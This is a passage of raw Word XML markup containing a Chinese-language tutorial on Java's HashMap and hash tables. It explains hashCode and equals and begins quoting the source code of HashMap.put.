          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）底层说白了就是以前数据结构课程讲过的散列结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）要将元素放入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的类型必须要实现实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法，默认这个方法是根据对象的地址来计算的，具体我也记不太清楚了，接着还必须覆盖对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　用一张图来表示一下散列结构吧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="202859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4097655" cy="2268855"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="图片 1" descr="http://www.51testing.com/attachments/2013/09/14982672_201309171413021TUuK.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId3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51testing.com/attachments/2013/09/14982672_201309171413021TUuK.jpg">
                      <a:hlinkClick r:id="rId35" tgtFrame="&quot;_blank&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097655" cy="2268855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>函数就是用于确定当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>应该放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>桶里面的位置，这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>桶可以看成是一个数组，最简单的通过一些取余的方法就能用来确认</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>应该摆放的位置，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>函数则是为了与后面的元素之间判断重复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　好了，这里我们接下来来看看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的这两种类库的用法吧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　由于他们都实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口，将元素放进去的方法就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>），这里我们先来分析比较简单的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>吧：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8317" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="999999"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8317"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidTr="00223A40">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00223A40">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:before="136" w:after="136"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>    public V put(K key, V value) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        if (key == null)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            return putForNullKey(value);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        int hash = hash(key);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>获取当前</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        int i = indexFor(hash, table.length);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>返回在</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>桶里面的位置</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        for (Entry&lt;K,V&gt; e = table[i]; e != null; e = e.next) {  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>遍历当前</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
